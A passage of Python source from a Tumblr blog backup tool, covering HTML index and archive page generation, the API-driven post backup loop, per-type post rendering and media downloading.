os.stat(src)\n except EnvironmentError as e:\n if getattr(e, 'errno', None) not in (errno.ENOENT, errno.EISDIR):\n raise\n return False # Source does not exist (Python 2)\n\n try:\n dst_st = os.stat(dstpath) # type: Optional[os.stat_result]\n except EnvironmentError as e:\n if getattr(e, 'errno', None) != errno.ENOENT:\n raise\n dst_st = None # Destination does not exist yet\n\n # Do not overwrite if destination is no newer and has the same size\n if (dst_st is None\n or dst_st.st_mtime > src_st.st_mtime\n or dst_st.st_size != src_st.st_size\n ):\n # dup src because open() takes ownership and closes it\n shutil.copyfile(dup(src), dstpath)\n shutil.copystat(src, dstpath) # type: ignore[arg-type]\n\n return True # Either we copied it or we didn't need to\n\n\ndef naturaldelta(delta):\n \"\"\"Format a duration of at least one day approximately.\"\"\"\n days = delta.days\n years, days = divmod(days, 365)\n months = int(days // 30.436875)\n\n def pl(s, n):\n return s if n == 1 else '{}s'.format(s)\n\n mstr = '{} {}'.format(months, pl('month', months)) if months else None # N months\n\n if years:\n msg = '{} {}'.format(years, pl('year', years)) # N years\n return '{}, {}'.format(msg, mstr) if mstr else msg\n\n return mstr if mstr else '{} {}'.format(days, pl('day', days)) # N days\n\n\nclass Index(object):\n def __init__(self, blog, body_class='index'):\n self.blog = blog\n self.body_class = body_class\n self.index = defaultdict(lambda: defaultdict(list)) # type: DefaultDict[int, DefaultDict[int, List[LocalPost]]]\n\n def add_post(self, post):\n self.index[post.tm.tm_year][post.tm.tm_mon].append(post)\n\n def save_index(self, index_dir='.', title=None):\n archives = sorted(((y, m) for y in self.index for m in 
self.index[y]),\n reverse=options.reverse_month\n )\n subtitle = self.blog.title if title else self.blog.subtitle\n title = title or self.blog.title\n with open_text(index_dir, dir_index) as idx:\n idx.write(self.blog.header(title, self.body_class, subtitle, avatar=True))\n if options.tag_index and self.body_class == 'index':\n idx.write('<p><a href={}>Tag index</a></p>\\n'.format(\n urlpathjoin(tag_index_dir, dir_index)\n ))\n for year in sorted(self.index.keys(), reverse=options.reverse_index):\n self.save_year(idx, archives, index_dir, year)\n idx.write(u'<footer><p>Generated on %s by <a href=https://github.com/'\n 'bbolli/tumblr-utils>tumblr-utils</a>.</p></footer>\\n' % strftime('%x %X')\n )\n\n def save_year(self, idx, archives, index_dir, year):\n idx.write(u'<h3>%s</h3>\\n<ul>\\n' % year)\n for month in sorted(self.index[year].keys(), reverse=options.reverse_index):\n tm = time.localtime(time.mktime((year, month, 3, 0, 0, 0, 0, 0, -1)))\n month_name = self.save_month(archives, index_dir, year, month, tm)\n idx.write(u' <li><a href={} title=\"{} post(s)\">{}</a></li>\\n'.format(\n urlpathjoin(archive_dir, month_name), len(self.index[year][month]), strftime('%B', tm)\n ))\n idx.write(u'</ul>\\n\\n')\n\n def save_month(self, archives, index_dir, year, month, tm):\n posts = sorted(self.index[year][month], key=lambda x: x.date, reverse=options.reverse_month)\n posts_month = len(posts)\n posts_page = options.posts_per_page if options.posts_per_page >= 1 else posts_month\n\n def pages_per_month(y, m):\n posts_m = len(self.index[y][m])\n return posts_m // posts_page + bool(posts_m % posts_page)\n\n def next_month(inc):\n i = archives.index((year, month))\n i += inc\n if 0 <= i < len(archives):\n return archives[i]\n return 0, 0\n\n FILE_FMT = '%d-%02d-p%s%s'\n pages_month = pages_per_month(year, month)\n first_file = None # type: Optional[str]\n for page, start in enumerate(xrange(0, posts_month, posts_page), start=1):\n\n archive = [self.blog.header(strftime('%B %Y', tm), body_class='archive')]\n archive.extend(p.get_post(self.body_class == 'tag-archive') for p in posts[start:start + posts_page])\n\n suffix = '/' if options.dirs else post_ext\n file_name = FILE_FMT % (year, month, page, suffix)\n if options.dirs:\n base = urlpathjoin(save_dir, archive_dir)\n arch = open_text(index_dir, archive_dir, file_name, dir_index)\n else:\n base = ''\n arch = open_text(index_dir, archive_dir, file_name)\n\n if page > 1:\n pp = FILE_FMT % (year, month, page - 1, suffix)\n else:\n py, pm = next_month(-1)\n pp = FILE_FMT % (py, pm, pages_per_month(py, pm), suffix) if py else ''\n first_file = file_name\n\n if page < pages_month:\n np = FILE_FMT % (year, month, page + 1, suffix)\n else:\n ny, nm = next_month(+1)\n np = FILE_FMT % (ny, nm, 1, suffix) if ny else ''\n\n archive.append(self.blog.footer(base, pp, np))\n\n arch.write('\\n'.join(archive))\n\n assert first_file is not None\n return first_file\n\n\nclass TagIndex(Index):\n def __init__(self, blog, name):\n super(TagIndex, self).__init__(blog, 'tag-archive')\n self.name = name\n\n\nclass Indices(object):\n def __init__(self, blog):\n self.blog = blog\n self.main_index = Index(blog)\n self.tags = {}\n\n def build_index(self):\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n for post in (LocalPost(f) for f in glob(path_to(post_dir, filter_))):\n self.main_index.add_post(post)\n if options.tag_index:\n for tag, name in post.tags:\n if tag not in self.tags:\n self.tags[tag] = TagIndex(self.blog, name)\n self.tags[tag].name = 
name\n self.tags[tag].add_post(post)\n\n def save_index(self):\n self.main_index.save_index()\n if options.tag_index:\n self.save_tag_index()\n\n def save_tag_index(self):\n global save_dir\n save_dir = '../../..'\n mkdir(path_to(tag_index_dir))\n tag_index = [self.blog.header('Tag index', 'tag-index', self.blog.title, avatar=True), '<ul>']\n for tag, index in sorted(self.tags.items(), key=lambda kv: kv[1].name):\n digest = hashlib.md5(to_bytes(tag)).hexdigest()\n index.save_index(tag_index_dir + os.sep + digest,\n u\"Tag ‛%s’\" % index.name\n )\n tag_index.append(u' <li><a href={}>{}</a></li>'.format(\n urlpathjoin(digest, dir_index), escape(index.name)\n ))\n tag_index.extend(['</ul>', ''])\n with open_text(tag_index_dir, dir_index) as f:\n f.write(u'\\n'.join(tag_index))\n\n\nclass TumblrBackup(object):\n def __init__(self):\n self.failed_blogs = []\n self.total_count = 0\n self.post_count = 0\n self.filter_skipped = 0\n self.title = None # type: Optional[Text]\n self.subtitle = None # type: Optional[str]\n\n def exit_code(self):\n if self.failed_blogs:\n return EXIT_ERRORS\n if self.total_count == 0:\n return EXIT_NOPOSTS\n return EXIT_SUCCESS\n\n def header(self, title='', body_class='', subtitle='', avatar=False):\n root_rel = {\n 'index': '', 'tag-index': '..', 'tag-archive': '../..'\n }.get(body_class, save_dir)\n css_rel = urlpathjoin(root_rel, custom_css if have_custom_css else backup_css)\n if body_class:\n body_class = ' class=' + body_class\n h = u'''<!DOCTYPE html>\n\n<meta charset=%s>\n<title>%s</title>\n<link rel=stylesheet href=%s>\n\n<body%s>\n\n<header>\n''' % (FILE_ENCODING, self.title, css_rel, body_class)\n if avatar:\n f = glob(path_to(theme_dir, avatar_base + '.*'))\n if f:\n h += '<img src={} alt=Avatar>\\n'.format(urlpathjoin(root_rel, theme_dir, split(f[0])[1]))\n if title:\n h += u'<h1>%s</h1>\\n' % title\n if subtitle:\n h += u'<p class=subtitle>%s</p>\\n' % subtitle\n h += '</header>\\n'\n return h\n\n @staticmethod\n def footer(base, previous_page, next_page):\n f = '<footer><nav>'\n f += '<a href={} rel=index>Index</a>\\n'.format(urlpathjoin(save_dir, dir_index))\n if previous_page:\n f += '| <a href={} rel=prev>Previous</a>\\n'.format(urlpathjoin(base, previous_page))\n if next_page:\n f += '| <a href={} rel=next>Next</a>\\n'.format(urlpathjoin(base, next_page))\n f += '</nav></footer>
\\n'\n return f\n\n @staticmethod\n def get_post_timestamps(posts):\n for post in posts:\n with io.open(post, encoding=FILE_ENCODING) as pf:\n soup = BeautifulSoup(pf, 'lxml')\n postdate = soup.find('time')['datetime']\n del soup\n # No datetime.fromisoformat or datetime.timestamp on Python 2\n yield (datetime.strptime(postdate, '%Y-%m-%dT%H:%M:%SZ') - datetime(1970, 1, 1)) // timedelta(seconds=1)\n\n def backup(self, account, prev_archive):\n \"\"\"makes single files and an index for every post on a public Tumblr blog account\"\"\"\n\n base = get_api_url(account)\n\n # make sure there are folders to save in\n global save_folder, media_folder, post_ext, post_dir, save_dir, have_custom_css\n if options.blosxom:\n save_folder = root_folder\n post_ext = '.txt'\n post_dir = os.curdir\n post_class = BlosxomPost # type: Type[TumblrPost]\n else:\n save_folder = join(root_folder, options.outdir or account)\n media_folder = path_to(media_dir)\n if options.dirs:\n post_ext = ''\n save_dir = '../..'\n mkdir(path_to(post_dir), recursive=True)\n else:\n mkdir(save_folder, recursive=True)\n post_class = TumblrPost\n have_custom_css = os.access(path_to(custom_css), os.R_OK)\n\n self.post_count = 0\n self.filter_skipped = 0\n\n # get the highest post id already saved\n ident_max = None\n if options.incremental:\n filter_ = join('*', dir_index) if options.dirs else '*' + post_ext\n post_glob = glob(path_to(post_dir, filter_))\n if not post_glob:\n pass # No posts to read\n elif options.likes:\n # Read every post to find the newest timestamp we've saved.\n if BeautifulSoup is None:\n raise RuntimeError(\"Incremental likes backup: module 'bs4' is not installed\")\n logger.warn('Finding newest liked post (may take a while)\\n', account=True)\n ident_max = max(self.get_post_timestamps(post_glob))\n else:\n ident_max = max(long(splitext(split(f)[1])[0]) for f in post_glob)\n if ident_max is not None:\n logger.info('Backing up posts after {}\\n'.format(ident_max), account=True)\n\n logger.status('Getting basic information\\r')\n\n api_parser = ApiParser(base, account)\n if prev_archive:\n api_parser.read_archive(prev_archive)\n resp = api_parser.apiparse(1)\n if not resp:\n self.failed_blogs.append(account)\n return\n\n # collect all the meta information\n if options.likes:\n if not resp.get('blog', {}).get('share_likes', True):\n logger.error('{} does not have public likes\\n'.format(account))\n self.failed_blogs.append(account)\n return\n posts_key = 'liked_posts'\n blog = {}\n count_estimate = resp['liked_count']\n else:\n posts_key = 'posts'\n blog = resp.get('blog', {})\n count_estimate = blog.get('posts')\n self.title = escape(blog.get('title', account))\n self.subtitle = blog.get('description', '')\n\n # use the meta information to create a HTML header\n TumblrPost.post_header = self.header(body_class='post')\n\n # start the thread pool\n backup_pool = ThreadPool()\n\n oldest_date = None\n\n # returns whether any posts from this batch were saved\n def _backup(posts, post_respfiles):\n def sort_key(x): return x[0]['liked_timestamp'] if options.likes else long(x[0]['id'])\n sorted_posts = sorted(zip(posts, post_respfiles), key=sort_key, reverse=True)\n for p, prf in sorted_posts:\n no_internet.check()\n post = post_class(p, account, prf, prev_archive)\n oldest_date = post.date\n if ident_max is None:\n pass # No limit\n elif (p['liked_timestamp'] if options.likes else long(post.ident)) <= ident_max:\n logger.info('Stopping backup: Incremental backup complete\\n', account=True)\n return False, oldest_date\n 
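# The checks below run in order for each post: the period option's date bounds, the requested type/tag selection, reblog exclusion, a no-clobber check for posts already on disk, and the user-supplied filter expression; the first failing check skips the post (and reaching the period's start bound stops the whole run).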
if options.period:\n if post.date > options.p_stop:\n raise RuntimeError('Found post with date ({}) newer than before param ({})'.format(\n post.date, options.p_stop))\n if post.date < options.p_start:\n logger.info('Stopping backup: Reached end of period\\n', account=True)\n return False, oldest_date\n if options.request:\n if post.typ not in options.request:\n continue\n tags = options.request[post.typ]\n if not (TAG_ANY in tags or tags & post.tags_lower):\n continue\n if options.no_reblog:\n if 'reblogged_from_name' in p or 'reblogged_root_name' in p:\n if 'trail' in p and not p['trail']:\n continue\n if 'trail' in p and 'is_current_item' not in p['trail'][-1]:\n continue\n elif 'trail' in p and p['trail'] and 'is_current_item' not in p['trail'][-1]:\n continue\n if os.path.exists(path_to(*post.get_path())) and options.no_post_clobber:\n continue # Post exists and no-clobber enabled\n if options.filter and not options.filter.input(p).first():\n self.filter_skipped += 1\n continue\n\n while True:\n try:\n backup_pool.add_work(post.save_content, timeout=0.1)\n break\n except queue.Full:\n pass\n no_internet.check()\n\n self.post_count += 1\n if options.count and self.post_count >= options.count:\n logger.info('Stopping backup: Reached limit of {} posts\\n'.format(options.count), account=True)\n return False, oldest_date\n return True, oldest_date\n\n try:\n # Get the JSON entries from the API, which we can only do for MAX_POSTS posts at once.\n # Posts \"arrive\" in reverse chronological order. Post #0 is the most recent one.\n i = options.skip\n before = options.p_stop if options.period else None\n while True:\n # find the upper bound\n logger.status('Getting {}posts {} to {}{}\\r'.format(\n 'liked ' if options.likes else '', i, i + MAX_POSTS - 1,\n '' if count_estimate is None else ' (of {} expected)'.format(count_estimate),\n ))\n\n resp = api_parser.apiparse(MAX_POSTS, i, before)\n if resp is None:\n self.failed_blogs.append(account)\n break\n\n posts = resp[posts_key]\n if not posts:\n logger.info('Backup complete: Found empty set of posts\\n', account=True)\n break\n\n post_respfiles = resp.get('post_respfiles')\n if post_respfiles is None:\n post_respfiles = [None for _ in posts]\n res, oldest_date = _backup(posts, post_respfiles)\n if not res:\n break\n\n if options.likes:\n next_ = resp['_links'].get('next')\n if next_ is None:\n logger.info('Backup complete: Found end of likes\\n', account=True)\n break\n before = int(next_['query_params']['before'])\n elif before is not None:\n assert oldest_date <= before\n if oldest_date == before:\n oldest_date -= 1\n before = oldest_date\n i += MAX_POSTS\n except:\n # ensure proper thread pool termination\n backup_pool.cancel()\n raise\n\n # wait until all posts have been saved\n backup_pool.wait()\n\n # postprocessing\n if not options.blosxom and (self.post_count or options.count == 0):\n logger.status('Getting avatar and style\\r')\n get_avatar(prev_archive)\n get_style(prev_archive)\n if not have_custom_css:\n save_style()\n logger.status('Building index\\r')\n ix = Indices(self)\n ix.build_index()\n ix.save_index()\n\n logger.status(None)\n skipped_msg = (', {} did not match filter'.format(self.filter_skipped)) if self.filter_skipped else ''\n logger.warn(\n '{} {}posts backed up{}\\n'.format(self.post_count, 'liked ' if options.likes else '', skipped_msg),\n account=True,\n )\n self.total_count += self.post_count\n\n\nclass TumblrPost(object):\n post_header = '' # set by TumblrBackup.backup()\n\n def __init__(self, post, 
backup_account, respfile, prev_archive):\n # type: (JSONDict, str, Text, Text) -> None\n self.content = ''\n self.post = post\n self.backup_account = backup_account\n self.respfile = respfile\n self.prev_archive = prev_archive\n self.creator = post.get('blog_name') or post['tumblelog']\n self.ident = str(post['id'])\n self.url = post['post_url']\n self.shorturl = post['short_url']\n self.typ = str(post['type'])\n self.date = post['liked_timestamp' if options.likes else 'timestamp'] # type: float\n self.isodate = datetime.utcfromtimestamp(self.date).isoformat() + 'Z'\n self.tm = time.localtime(self.date)\n self.title = u''\n self.tags = post['tags']\n self.note_count = post.get('note_count')\n if self.note_count is None:\n self.note_count = post.get('notes', {}).get('count')\n if self.note_count is None:\n self.note_count = 0\n self.reblogged_from = post.get('reblogged_from_url')\n self.reblogged_root = post.get('reblogged_root_url')\n self.source_title = post.get('source_title', '')\n self.source_url = post.get('source_url', '')\n self.tags_lower = None # type: Optional[Set[str]]\n if options.request:\n self.tags_lower = {t.lower() for t in self.tags}\n self.file_name = join(self.ident, dir_index) if options.dirs else self.ident + post_ext\n self.llink = self.ident if options.dirs else self.file_name\n self.media_dir = join(post_dir, self.ident) if options.dirs else media_dir\n self.media_url = urlpathjoin(save_dir, self.media_dir)\n self.media_folder = path_to(self.media_dir)\n\n def save_content(self):\n \"\"\"generates the content for this post\"\"\"\n post = self.post\n content = []\n\n def append(s, fmt=u'%s'):\n content.append(fmt % s)\n\n def get_try(elt):\n return post.get(elt, '')\n\n def append_try(elt, fmt=u'%s'):\n elt = get_try(elt)\n if elt:\n if options.save_images:\n elt = re.sub(r'''(?i)(<img\\s(?:[^>]*\\s)?src\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_image, elt\n )\n if options.save_video or options.save_video_tumblr:\n # Handle video element poster attribute\n elt = re.sub(r'''(?i)(<video\\s(?:[^>]*\\s)?poster\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_video_poster, elt\n )\n # Handle video element's source sub-element's src attribute\n elt = re.sub(r'''(?i)(<source\\s(?:[^>]*\\s)?src\\s*=\\s*[\"'])(.*?)([\"'][^>]*>)''',\n self.get_inline_video, elt\n )\n append(elt, fmt)\n\n if self.typ == 'text':\n self.title = get_try('title')\n append_try('body')\n\n elif self.typ == 'photo':\n url = get_try('link_url')\n is_photoset = len(post['photos']) > 1\n for offset, p in enumerate(post['photos'], start=1):\n o = p['alt_sizes'][0] if 'alt_sizes' in p else p['original_size']\n src = o['url']\n if options.save_images:\n src = self.get_image_url(src, offset if is_photoset else 0)\n append(escape(src), u'<img alt=\"\" src=\"%s\">')\n if url:\n content[-1] = u'<a href=\"%s\">%s</a>' % (escape(url), content[-1])\n content[-1] = '<p>' + content[-1] + '</p>'\n if p['caption']:\n append(p['caption'], u'<p>%s</p>')
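# Every photo above got its own <p>-wrapped <img> (linked if the post has a link_url); the caption appended here once is the photoset-level caption from the API.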
append_try('caption')\n\n elif self.typ == 'link':\n url = post['url']\n self.title = u'<a href=\"%s\">%s</a>' % (escape(url), post['title'] or url)\n append_try('description')\n\n elif self.typ == 'quote':\n append(post['text'], u'<blockquote><p>%s</p></blockquote>')\n append_try('source', u'<p>%s</p>')
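# Video posts prefer a locally saved copy of the file (Tumblr-hosted video, or external video fetched via youtube-dl) and fall back to the API's embed code below.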
elif self.typ == 'video':\n src = ''\n if (options.save_video or options.save_video_tumblr) \\\n and post['video_type'] == 'tumblr':\n src = self.get_media_url(post['video_url'], '.mp4')\n elif options.save_video:\n src = self.get_youtube_url(self.url)\n if not src:\n logger.warn('Unable to download video in post #{}\\n'.format(self.ident))\n if src:\n append(u'<p><video controls><source src=\"%s\" type=video/mp4>%s<br>\\n<a href=\"%s\">%s</a></video></p>' % (\n src, \"Your browser does not support the video element.\", src, \"Video file\"\n ))
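# No local copy was saved: keep the embed player from the API response as-is.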
else:\n player = get_try('player')\n if player:\n append(player[-1]['embed_code'])\n else:\n append_try('video_url')\n append_try('caption')\n\n elif self.typ == 'audio':\n def make_player(src_):\n append(u'<p><audio controls><source src=\"{src}\" type=audio/mpeg>{}<br>\\n<a href=\"{src}\">{}</a></audio></p>'\n .format('Your browser does not support the audio element.', 'Audio file', src=src_))
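# Tumblr audio may be hosted at a.tumblr.com or behind a www.tumblr.com/audio_file/ URL; the latter is rewritten to its canonical a.tumblr.com mp3 form below before downloading.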
src = None\n audio_url = get_try('audio_url') or get_try('audio_source_url')\n if options.save_audio:\n if post['audio_type'] == 'tumblr':\n if audio_url.startswith('https://a.tumblr.com/'):\n src = self.get_media_url(audio_url, '.mp3')\n elif audio_url.startswith('https://www.tumblr.com/audio_file/'):\n audio_url = u'https://a.tumblr.com/{}o1.mp3'.format(urlbasename(urlparse(audio_url).path))\n src = self.get_media_url(audio_url, '.mp3')\n elif post['audio_type'] == 'soundcloud':\n src = self.get_media_url(audio_url, '.mp3')\n player = get_try('player')\n if src:\n make_player(src)\n elif player:\n append(player)\n elif audio_url:\n make_player(audio_url)\n append_try('caption')\n\n elif self.typ == 'answer':\n self.title = post['question']\n append_try('answer')\n\n elif self.typ == 'chat':\n self.title = get_try('title')\n append(\n u'<br>\\n'.join('<strong>%(label)s</strong> %(phrase)s' % d for d in post['dialogue']),\n u'<p>%s</p>'\n )
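# Post types not handled above are preserved as escaped raw JSON so that no data is silently lost.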
else:\n logger.warn(u\"Unknown post type '{}' in post #{}\\n\".format(self.typ, self.ident))\n append(escape(self.get_json_content()), u'<pre>%s</pre>')
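# Join the accumulated fragments, then unwrap <p> tags that ended up directly wrapping another <p>, <ol> or <iframe> (see the regex pair below).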
self.content = '\\n'.join(content)\n\n # fix wrongly nested HTML elements\n for p in ('<p>(<(%s)>)', '(</(%s)>)</p>
'):\n self.content = re.sub(p % 'p|ol|iframe[^>]*', r'\\1', self.content)\n\n self.save_post()\n\n def get_youtube_url(self, youtube_url):\n # determine the media file name\n filetmpl = u'%(id)s_%(uploader_id)s_%(title)s.%(ext)s'\n ydl_options = {\n 'outtmpl': join(self.media_folder, filetmpl),\n 'quiet': True,\n 'restrictfilenames': True,\n 'noplaylist': True,\n 'continuedl': True,\n 'nooverwrites': True,\n 'retries': 3000,\n 'fragment_retries': 3000,\n 'ignoreerrors': True,\n }\n if options.cookiefile is not None:\n ydl_options['cookiefile'] = options.cookiefile\n ydl = youtube_dl.YoutubeDL(ydl_options)\n ydl.add_default_info_extractors()\n try:\n result = ydl.extract_info(youtube_url, download=False)\n media_filename = youtube_dl.utils.sanitize_filename(filetmpl % result['entries'][0], restricted=True)\n except Exception:\n return ''\n\n # check if a file with this name already exists\n if not os.path.isfile(media_filename):\n try:\n ydl.extract_info(youtube_url, download=True)\n except Exception:\n return ''\n return urlpathjoin(self.media_url, split(media_filename)[1])\n\n def get_media_url(self, media_url, extension):\n if not media_url:\n return ''\n media_filename = self.get_filename(media_url)\n media_filename = urlsplitext(media_filename)[0] + extension\n saved_name = self.download_media(media_url, media_filename)\n if saved_name is not None:\n return urlpathjoin(self.media_url, saved_name)\n return media_url\n\n def get_image_url(self, image_url, offset):\n \"\"\"Saves an image if not saved yet. Returns the new URL or\n the original URL in case of download errors.\"\"\"\n image_filename = self.get_filename(image_url, '_o%s' % offset if offset else '')\n saved_name = self.download_media(image_url, image_filename)\n if saved_name is not None:\n if options.exif and saved_name.endswith('.jpg'):\n add_exif(join(self.media_folder, saved_name), set(self.tags))\n return urlpathjoin(self.media_url, saved_name)\n return image_url\n\n @staticmethod\n def maxsize_image_url(image_url):\n if \".tumblr.com/\" not in image_url or image_url.endswith('.gif'):\n return image_url\n # change the image resolution to 1280\n return re.sub(r'_\\d{2,4}(\\.\\w+)$', r'_1280\\1', image_url)\n\n def get_inline_image(self, match):\n \"\"\"Saves an inline image if not saved yet. Returns the new tag or\n the original one in case of download errors.\"\"\"\n image_url, image_filename = self._parse_url_match(match, transform=self.maxsize_image_url)\n if not image_filename or not image_url.startswith('http'):\n return match.group(0)\n saved_name = self.download_media(image_url, image_filename)\n if saved_name is None:\n return match.group(0)\n return u'%s%s/%s%s' % (match.group(1), self.media_url,\n saved_name, match.group(3)\n )\n\n def get_inline_video_poster(self, match):\n \"\"\"Saves an inline video poster if not saved yet. Returns the new\n